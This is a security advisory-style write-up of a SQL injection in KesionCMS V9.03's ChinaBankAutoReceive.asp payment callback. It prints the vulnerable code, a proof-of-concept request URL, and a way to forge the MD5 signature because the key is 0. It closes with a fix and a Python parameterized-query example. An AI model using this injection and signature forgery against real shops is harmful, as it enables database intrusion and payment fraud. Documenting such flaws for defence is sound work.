KesionCMS V9.03 Final SQL Injection

Source: Internet
Author: User

The vulnerability exists in User/ChinaBankAutoReceive.asp:

<%@ LANGUAGE="VBSCRIPT" CODEPAGE="936" %>
<% option explicit %>
<!--#Include file="../Conn.asp"-->
<!--#Include file="../Plus/md5.asp"-->
<!--#Include file="../KS_Cls/Kesion.MemberCls.asp"-->
<!--#Include file="payfunction.asp"-->
<%
'**************************************************
'Software name: kesion CMS 9.0
'email: service@kesion.com  QQ: 111394,9537636
'Web: http://www.kesion.com http://www.kesion.cn
'Copyright (C) Kesion Network All Rights Reserved.
'**************************************************
Response.buffer = true
Response.expires = 1
Response.cacheControl = "no-cache"
Dim KSUser: Set KSUser = New UserCls
Dim KS: Set KS = New PublicCls
Dim PaymentPlat: PaymentPlat = 1
Dim RSP: Set RSP = Server.createObject("ADODB.RECORDSET")
RSP.open "Select top 1 * From KS_PaymentPlat where id=" & PaymentPlat, conn, 1, 1
If RSP.Eof Then
    RSP.Close: Set RSP = Nothing
    Response.Write "Error!"
    Response.end()
End If
Dim AccountID: AccountID = RSP("AccountID")
Dim MD5Key: MD5Key = RSP("MD5Key")
Dim PayOnlineRate: PayOnlineRate = KS.chkClng(RSP("Rate"))
Dim RateByUser: RateByUser = KS.chkClng(RSP("RateByUser"))
RSP.close: Set RSP = Nothing
Call ChinaBank() 'online banking return

Sub ChinaBank()
    Dim v_oid, v_pmode, v_pstatus, v_pstring, v_string, v_amount, v_moneytype, remark2, v_md5str, text, md5text, zhuangtai
    'Get the returned parameter values
    v_oid = request("v_oid")             'order number sent by the merchant
    v_pmode = request("v_pmode")         'payment method (string)
    v_pstatus = request("v_pstatus")     'payment status: 20 (payment successful); 30 (payment failed)
    v_pstring = request("v_pstring")     'payment result: "payment completed" (when v_pstatus = 20); cause of failure (when v_pstatus = 30)
    v_amount = request("v_amount")       'actual payment amount of the order
    v_moneytype = request("v_moneytype") 'actual payment currency of the order
    remark2 = request("remark2")         'remarks field 2
    v_md5str = request("v_md5str")       'MD5 verification string assembled by the online bank
    if request("v_md5str") = "" then
        response.Write("v_md5str: NULL")
        response.end
    end if
    text = v_oid & v_pstatus & v_amount & v_moneytype & MD5Key 'md5 verification
    md5text = Ucase(trim(md5(text, 32))) 'the MD5 verification string the merchant pieces together
    if md5text <> v_md5str then 'compare the bank's MD5 string with the merchant's
        response.write("error") 'tell the server that verification failed and ask it to resend
        response.end 'interrupt the program
    else
        response.write("OK")
        if v_pstatus = 20 then 'payment successful
            Call UpdateOrder(v_amount, remark2, v_oid, v_pmode)
            Conn.execute("Update KS_LogMoney Set PaymentID=1 Where OrderID='" & v_oid & "'")
        else
            response.write("error") 'tell the server that verification failed and ask it to resend
            response.end 'interrupt the program
        end if
    end if
end Sub
%>

In the above code, v_oid = request("v_oid") is not filtered, and it is then passed on in Call UpdateOrder(v_amount, remark2, v_oid, v_pmode). Next, let's look at UpdateOrder:

Sub UpdateOrder(v_amount, remark2, v_oid, v_pmode)
    Dim KSUser: Set KSUser = New UserCls
    Dim UserName, MoneyType, Money, Remark, sqlUser, rsUser, orderid, mobile, action
    orderid = v_oid
    IF Cbool(KSUser.userLoginChecked) Then UserName = KSUser.userName Else UserName = KS.S("UserName")
    '======== if the value is not obtained from the request, the stored value is kept ========
    If UserName = "" Then UserName = SUserName
    Dim UserCardID
    UserCardID = KS.chkClng(KS.S("UserCardID"))
    iF UserCardID = 0 Then UserCardID = sUserCardID
    Action = KS.G("Action"): if Action = "" Then Action = Saction
    '======================================================================
    Mobile = KSUser.getUserInfo("Mobile")
    Money = v_amount
    Remark = remark2
    Dim RSLog, RS
    Set RSLog = Server.createObject("ADODB.RECORDSET")
    RSLog.open "Select top 1 * From KS_LogMoney where orderid='" & v_oid & "'", Conn, 1, 1
    if RSLog.eof And RSLog.boF Then
        Select Case Action
            case "shop" 'mall shopping
                Set RS = Server.createObject("ADODB.RECORDSET")
                RS.open "Select top 1 * From KS_Order Where OrderID='" & v_oid & "'", Conn, 1, 3
                If RS.eof Then
                    RS.close: Set RS = Nothing
                    KS.die "<br><li>If you encounter any problems during the payment process, contact the website administrator!"
                End If
                If Mobile = "" Then
                    Mobile = RS("Mobile")
                End If
                RS("moneyreceept") = Money
                If Money >= RS("MoneyTotal") then
                    RS("PayStatus") = 1 'paid
                ElseIf Money <> 0 Then
                    RS("PayStatus") = 2 'partly paid
                Else
                    RS("PayStatus") = 0 'unpaid
                End If
                Dim OrderStatus: OrderStatus = rs("status")
                RS("Status") = 1
                RS("PaymentPlatId") = KS.chkClng(Request("PaymentPlat")) 'payment interface id
                rs("PayTime") = now 'record the payment time
                RS.update
                orderid = RS("OrderID")
                Dim XID: XID = RS("ID")
                Call KS.moneyInOrOut(rs("UserName"), RS("Contactman"), Money, 2, 1, now, rs("orderid"), "System", "for purchase order: " & v_oid & " use " & v_pmode & " online recharge", 0, 0)
                Call KS.moneyInOrOut(rs("UserName"), RS("Contactman"), Money, now, rs("orderid"), "System", Remark, 0, 0)
                '========================= Update inventory =========================
                Dim rsp: set rsp = conn.execute("select id,title from ks_product where id in (select proid from KS_OrderItem where orderid='" & rs("orderid") & "')")
                do while not rsp.eof
                    dim rsi: set rsi = conn.execute("select amount,attrid from ks_orderitem where orderid='" & rs("orderid") & "' and proid=" & rsp(0))
                    if not rsi.eof then
                        if OrderStatus <> 1 then 'deduct inventory
                            If RSI("AttrID") <> 0 Then
                                Conn.execute("update KS_ShopSpecificationPrice set amount=amount-" & RSI(0) & " Where amount>=" & RSI(0) & " and ID=" & RSI(1))
                            else
                                conn.execute("update ks_product set totalnum=totalnum-" & rsi(0) & " where totalnum>=" & rsi(0) & " and id=" & rsp(0))
                            End If
                        end if
                    end if
                    rsi.close
                    set rsi = nothing
                    'call KS.scoreInOrOut(UserName, 1, KS.chkClng(rsp(0) * amount, "system", "purchased item <font color=red>" & rsp("title") & "</font> free!", 0, 0)
                    rsp.movenext
                loop
                rsp.close
                set rsp = nothing
                '====================================================================
                RS.close: Set RS = Nothing
                IF KS.C("UserName") <> "" Then response.redirect "User_Order.asp?Action=ShowOrder&ID=" & XID
            Case else 'member center recharge
                Set rsUser = Server.createObject("Adodb.recordSet")
                sqlUser = "select top 1 * from KS_User where UserName='" & UserName & "'"
                rsUser.open sqlUser, Conn, 1, 1
                if rsUser.bof and rsUser.eof then
                    Response.write "<br><li>If you encounter any problems during the recharge process, contact the website administrator!"
                    rsUser.close: set rsUser = Nothing
                    exit sub
                end if
                Dim RealName: RealName = rsUser("RealName")
                Dim Edays: Edays = rsUser("Edays")
                Dim BeginDate: BeginDate = rsUser("BeginDate")
                rsUser.close: Set rsUser = Nothing
                If UserCardID <> 0 then 'recharge card
                    Call UpdateByCard(0, UserCardID, UserName, RealName, Edays, BeginDate, v_oid, v_pmode)
                Else
                    Call KS.moneyInOrOut(UserName, RealName, Money, 3, 1, now, v_oid, "System", v_pmode & " online recharge, order number:" & v_oid, 0, 0)
                End If
        End Select
    End If
    RSLog.close: Set RSLog = Nothing
End Sub

In RSLog.open "Select top 1 * From KS_LogMoney where orderid='" & v_oid & "'", Conn, 1, 1 the raw v_oid is included directly in the SQL! So, can we construct parameters to trigger the vulnerability? We construct: /User/ChinaBankAutoReceive.asp?v_oid=1%27&v_pstatus=20&v_amount=1&v_moneytype=1&v_md5str=9B5BF7166AFBB5E1602BBCC964459B9B where v_oid carries our SQL injection statement. As you know, v_md5str is obtained from md5(v_oid & v_pstatus & v_amount & v_moneytype & MD5Key), and the MD5Key value is read from the database, where it is 0. Simply put, after constructing the SQL statement in v_oid, compute v_md5str as md5(v_oid & v_pstatus & v_amount & v_moneytype & MD5Key) and then submit it.
Solution:

Filter the v_oid parameter before it is used in the SQL statement.
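As an added example (not from the original page or from KesionCMS), the following Python models the KS_LogMoney lookup on an in-memory SQLite table: the original string concatenation next to a version that validates v_oid against an assumed order-number format and binds it as a query parameter, plus the merchant-side MD5 check from the page, which only shows the sender knew MD5Key and is not a substitute for filtering. The table layout, sample rows and the order-id pattern are constructed for the example.

```python
import hashlib
import re
import sqlite3

# Constructed sample rows standing in for the KS_LogMoney table.
SAMPLE_ORDERS = [("20240101001", 0), ("20240101002", 0)]
# Assumed order-number format; adjust it to whatever the shop actually issues.
ORDER_ID_RE = re.compile(r"^[A-Za-z0-9]{1,32}$")

def make_db():
    """In-memory stand-in for the shop database (constructed, not KesionCMS's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE KS_LogMoney (OrderID TEXT, PaymentID INTEGER)")
    conn.executemany("INSERT INTO KS_LogMoney VALUES (?, ?)", SAMPLE_ORDERS)
    return conn

def lookup_vulnerable(conn, v_oid):
    """Mirrors the original handler: v_oid is concatenated straight into the SQL text."""
    sql = "SELECT * FROM KS_LogMoney WHERE OrderID = '" + v_oid + "'"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, v_oid):
    """Reject anything outside the expected format, then bind v_oid as a parameter."""
    if not ORDER_ID_RE.match(v_oid):
        raise ValueError("invalid order id")
    sql = "SELECT * FROM KS_LogMoney WHERE OrderID = ?"
    return conn.execute(sql, (v_oid,)).fetchall()

def merchant_signature(p, md5key):
    """The page's check: Ucase(md5(v_oid & v_pstatus & v_amount & v_moneytype & MD5Key))."""
    text = p["v_oid"] + p["v_pstatus"] + p["v_amount"] + p["v_moneytype"] + md5key
    return hashlib.md5(text.encode("utf-8")).hexdigest().upper()

def signature_ok(p, md5key):
    """True when the bank's v_md5str matches. This only shows the sender knew MD5Key
    (and when MD5Key is 0, as the page notes, anyone does); it does not make v_oid safe SQL."""
    return merchant_signature(p, md5key) == p["v_md5str"]

def classify(conn, lookup, v_oid):
    """Summarise what a lookup does with a given v_oid, for comparing both versions."""
    try:
        return "rows:%d" % len(lookup(conn, v_oid))
    except ValueError:
        return "rejected"
    except sqlite3.Error:
        return "sql-error"
```

With a single quote in v_oid the concatenated query fails to parse, while the hardened path rejects the value before any SQL is built.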